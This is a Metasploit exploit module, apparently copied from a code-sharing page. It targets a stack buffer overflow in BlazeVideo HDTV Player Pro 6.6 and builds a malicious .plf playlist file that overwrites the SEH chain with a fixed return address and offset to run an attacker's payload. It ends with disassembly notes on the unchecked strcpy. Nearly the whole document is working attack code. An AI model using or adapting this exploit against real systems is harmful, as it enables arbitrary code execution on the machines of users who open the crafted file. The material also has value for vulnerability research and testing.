扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info={}) super(update_info(info, 'Name' => "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability", 'Description'=> %q{ This module exploits a vulnerability found in BlazeVideo HDTV Player's filename handling routine.When supplying a string of input data embedded in a .plf file, the MediaPlayerCtrl.dll component will try to extract a filename by using PathFindFileNameA(), and then copies whatever the return value is on the stack by using an inline strcpy.As a result, if this input data is long enough, it can cause a stack-based buffer overflow, which may lead to arbitrary code execution under the context of the user. }, 'License'=> MSF_LICENSE, 'Author' => [ 'b33f', #Original 'sinn3r'#Metasploit ], 'References' => [ ['OSVDB', '80896'], ['EDB', '18693'], ['EDB', '22931'] ], 'Payload'=> { 'BadChars'=> "\x00\x0a\x1a\x2f\x3a\x5c", 'StackAdjustment' => -3500 }, 'DefaultOptions'=> { 'ExitFunction' => "seh" }, 'Platform' => 'win', 'Targets'=> [ # MediaPlayerCtrl.dll P/P/R # Tested on: Windows 7 SP1/SP0, Windows XP SP3 / Windows Vista SP2/SP1/SP0 ['BlazeVideo HDTV Player Pro v6.6.0.3', {'Ret'=>0x64020327, 'Offset'=>868}] ], 'Privileged' => false, 'DisclosureDate' => "Apr 03 2012", 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']) ], self.class) end def exploit buf = 'http://' buf << rand_text_alpha_upper(target['Offset']) buf << generate_seh_record(target.ret) buf << payload.encoded buf << rand_text_alpha(5000-buf.length) print_status("Creating '#{datastore['FILENAME']}'...") file_create(buf) end end =begin Version: HDTV Player Professional v6.6 In MediaPlayerCtrl.dll (File version: 2.0.0.2; Product version: 2.0.0.2) .text:6400E574 mov eax, [esp+138h+Source] .text:6400E578 mov edx, [ebp+0ECh] .text:6400E57E pusheax .text:6400E57F pusheax ; pszPath<-- Our URL .text:6400E580 mov edi, [edx] .text:6400E582 callebx ; PathFindFileNameA .text:6400E584 mov ecx, [ebp+0ECh] .text:6400E58A pusheax ; File path to copy .text:6400E58B pushesi .text:6400E58C push1 .text:6400E58E calldword ptr [edi] ; 0x6400f1f0 0x6400F1F0 (no length check either) goes down to 0x6400F670: int __thiscall sub_6400F670(int this, int a2, int a3, const char *source, const char *a5) { ... v5 = this; if ( a2 && source && a5 ) { memset(&buffer, 0, '\x02\x10'); v16 = *(this + 4); *(this + 4) = v16 + 1; v18 = a3; buffer = a2; strcpy(&Dest2, source);// <-- This is a rep movs =end |
体验盒子
